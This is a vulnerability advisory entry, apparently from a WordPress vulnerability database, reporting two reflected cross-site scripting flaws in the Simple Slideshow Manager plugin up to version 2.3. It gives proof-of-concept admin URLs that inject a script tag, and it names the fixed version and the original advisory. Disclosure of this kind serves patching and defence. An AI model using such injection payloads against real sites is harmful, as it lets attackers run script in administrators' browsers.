Simple Slideshow Manager <= 2.3 – Multiple Vulnerabilities



Proof of Concept
3.1 Cross-Site Scripting
Vulnerable Function: echo
Vulnerable Variable: $_GET['name']
Vulnerable URL:
http://www.vulnerablesite.com/wp-admin/admin.php?page=Acurax-Slideshow-AddImages&name="></script><script>alert(42)</script>

3.2 Cross-Site Scripting
Vulnerable Function: echo
Vulnerable Variable: $_SERVER['REQUEST_URI']
Vulnerable URL:
http://www.vulnerablesite.com/wp-admin/admin.php?page=Acurax-Slideshow-AddImages&name="></script><script>alert(42)</script>

Affects Plugin

fixed in version 2.3.1

References

URL http://defensecode.com/advisories/DC-2017-02-016_WordPress_Simple_Slideshow_Manager_Plugin_Advisory.pdf

Classification

Type MULTI

Miscellaneous

Submitter Neven Biruski
Submitter Website http://www.defensecode.com
Submitter Twitter DefenseCode/
Views 6531
Verified No
WPVDB ID 8841

Timeline

Publicly Published 2017-05-31 (about 3 years ago)
Added 2017-06-01 (about 3 years ago)
Last Updated 2019-11-01 (8 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin